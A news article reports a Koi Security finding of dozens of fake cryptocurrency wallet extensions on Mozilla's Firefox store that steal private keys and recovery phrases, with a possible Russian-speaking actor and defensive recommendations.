Hackers Target Cryptocurrency Users on Firefox

A troubling revelation has emerged with over forty fraudulent extensions imitating popular cryptocurrency wallet apps like Coinbase, MetaMask, and Trust Wallet currently available on Mozilla’s Firefox extension store. As detailed in a report by Koi Security dated July 2, 2025, these imitation extensions pose a significant threat by secretly collecting users’ wallet credentials. Despite being active since April, the campaign is evolving, with new extensions added as recently as last week. Numerous fake five-star reviews have deceptively enhanced their credibility among users.

How Do Fake Extensions Operate?

These counterfeit extensions employ the logos and descriptions of well-known crypto wallet services, creating a façade of authenticity. By leveraging popular keywords, they swiftly gain prominence in search results and increase their download rates. Once installed, although the interface seems legitimate, hidden scripts extract private keys and recovery phrases, transmitting them to malicious servers, posing a significant risk to users.

Are Russian Connections Involved?

Security researchers have identified Russian-language comments embedded within PDF files and notes in the extensions’ source code, suggesting a potential Russian-speaking threat actor. While conclusive evidence remains elusive, geographic details such as timestamps and file paths support the likelihood of this theory. Researchers remain cautious, acknowledging that more proof is needed to confirm these findings.

Since the observed onset in April, over 60 variations have surfaced, with the latest release happening just last week. To bypass detection, these extensions consistently update and rebrand, continuing their presence in the store. Some undetected copies still linger, prompting Koi Security to advise users to upgrade extensions only through verified site links.

The following concrete measures need consideration:

• Regular checks and audits of extension stores to identify and remove malicious extensions.
• Educating users on verifying extension authenticity before installation.
• Implementing enhanced scanning processes to detect hidden malicious scripts.

Mozilla’s Firefox extension store remains a target for bad actors exploiting security gaps through deceptive practices. As these threats evolve and continue to endanger users, vigilance and heightened awareness of extension authenticity is crucial for safeguarding digital assets.